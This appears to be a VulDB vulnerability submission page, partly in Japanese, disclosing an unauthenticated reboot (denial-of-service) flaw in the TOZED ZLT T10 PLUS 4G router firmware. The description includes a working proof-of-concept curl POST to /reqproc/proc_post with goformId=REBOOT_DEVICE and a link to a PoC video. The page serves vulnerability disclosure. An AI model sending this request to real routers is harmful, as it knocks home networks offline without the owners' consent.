提出 #679507: TOZED ZLT T10 PLUS (ZLT family 4G CPE) T10PLUS_3.04.15 Denial of Service情報

タイトルTOZED ZLT T10 PLUS (ZLT family 4G CPE) T10PLUS_3.04.15 Denial of Service
説明 The router’s web interface accepts an unauthenticated POST request to `/reqproc/proc_post` with `goformId=REBOOT_DEVICE` and reboots the device without requiring an active authenticated session. This allows an attacker with network access to the router (LAN or guest network depending on configuration) to remotely reboot the device, causing a denial-of-service to the home network. Proof-of-Concept (POC) HTTP request (tested on device): curl -v -X POST "http://192.168.8.1/reqproc/proc_post" \ -H "Content-Type: application/x-www-form-urlencoded;charset=utf-8" \ --data "isTest=false&uniquelogincredentials=&goformId=REBOOT_DEVICE" PoC video: https://youtu.be/3Me3wlH5cfU
ソース⚠️ http://192.168.8.1/reqproc/proc_post?isTest=false&uniquelogincredentials=&goformId=REBOOT_DEVICE
ユーザー
 Anonymous User
送信2025年10月21日 22:37 (9 月 ago)
モデレーション2025年11月08日 17:44 (18 days later)
ステータス承諾済み
VulDBエントリ331635 [TOZED ZLT T10 T10PLUS_3.04.15 Reboot /reqproc/proc_post サービス拒否]
ポイント20

Do you need the next level of professionalism?

Upgrade your account now!